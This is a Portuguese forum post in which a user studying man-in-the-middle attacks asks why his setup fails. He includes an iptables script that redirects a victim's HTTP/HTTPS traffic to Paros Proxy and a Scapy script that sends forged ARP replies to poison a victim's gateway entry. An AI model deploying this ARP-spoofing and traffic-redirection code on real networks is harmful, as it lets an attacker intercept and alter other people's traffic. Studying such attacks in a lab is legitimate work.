Paros Proxy (MitM proxy) + Iptables
1. Paros Proxy (MitM proxy) + Iptables
ericlucio
(usa Ubuntu)
Enviado em 26/04/2012 - 12:11h
Olá pessoal, estou fazendo um trabalho sobre man in the middle e meu objetivo é fazer com que o tráfego de dados entre uma máquina e um gateway seja interceptado e analisado e ou modificado pelo Paros Proxy.Para máquinas locais é bem fácil configurar o paros proxy, basta configurar em qual PROXY virtual o Paros vai escutar, o padrão é localhost:8080 e depois ir no navegador e configurar para ele usar o proxy localhost:8080. Estou usando a config padrão.
O problema é que quero fazer isso em uma máquina que está na mesma rede que está mandando seus pacotes para o atacante achando que está enviado para o gateway.
Agora é que entra o IPTABLES, para fazer com que esses pacotes quando cheguem na maquina atacante eles sejam redirecionados para a porta onde o paros está escutando.
Estou usando essas configurações mas não está funcionando, gostaria da ajuda de vocês para poder fazer essa configuração:
################################///////////////###############################
#!/bin/sh
INTERFACE="eth0"
SERVERWEB='192.168.1.11' #ip atacante TENTEI COLOCAR DEPOIS DO IP A PORTA 8080 mas não funcionou
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects
#clear rule..
iptables --flush
iptables --zero
iptables --delete-chain
iptables -F -t nat
iptables --append FORWARD --in-interface $INTERFACE --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface $INTERFACE --jump MASQUERADE
#rendirect traffic.. on my server/proxy
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination $SERVERWEB
iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination $SERVERWEB
##################################//////////////////##############################
Estou seguindo esse artigo do clshack
http://www.clshack.com/en/arp-poisoning-scapy-web-request-spoofed-paros-proxy-on-backbox.html
MAQUINA ATACANTE: Distro BACKBOX
Vítima: Debian 6
SCRIPT PARA GERAR OS PACOTES ARP FALSOS:
#########################////////////################################
from scapy.all import *;
from time import sleep;
conf.iface='eth0';#network card XD
target="192.168.1.153";#Alvo / Vitima
router="192.168.1.1";#router
packet = ARP(); #create packet :P
packet.psrc = router # Gateway
packet.pdst = target # victim v.v
try:
while 1:
send(packet, verbose=0);
sleep(50);
except:
pass
###########################//////////############################
Obrigado pela atenção desde já,
Eric Lúcio
Patrocínio
Destaques
Atenção a quem posta conteúdo de dicas, scripts e tal (6)
Artigos
Configuração para desligamento automatizado de Computadores em um Ambiente Comercial
O mínimo que você precisa saber sobre o terminal (parte 2)
O mínimo que você precisa saber sobre o terminal (parte 1)
Como iniciar uma máquina virtual do VirtualBox automaticamente no boot do LUbuntu 18 LTS
Dicas
Como deixar as abas do Firefox mais fininhas
Mudar o gerenciador de login (GDM para SDDM)
"Tentando" fazer com que programas rodem no Wayland e no X11
Tópicos
Windows XP rodando no Linux (5)
Google Chrome não para de escrever no disco (6)
Som saiu,sumio,nao funciona, apos atualizacao do linux mint por 22 (1)
Erro ao iniciar Ubuntu 24.04.1 LTS - Management Owner Key - MoK (3)
Top 10 do mês
-
Xerxes
1° lugar - 67.280 pts -
Fábio Berbert de Paula
2° lugar - 43.482 pts -
Clodoaldo Santos
3° lugar - 31.671 pts -
Sidnei Serra
4° lugar - 19.789 pts -
Buckminster
5° lugar - 16.829 pts -
Mauricio Ferrari
6° lugar - 13.688 pts -
Daniel Lara Souza
7° lugar - 12.633 pts -
Diego Mendes Rodrigues
8° lugar - 12.409 pts -
Alberto Federman Neto.
9° lugar - 11.504 pts -
edps
10° lugar - 9.675 pts
Scripts
A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.
Site hospedado por:
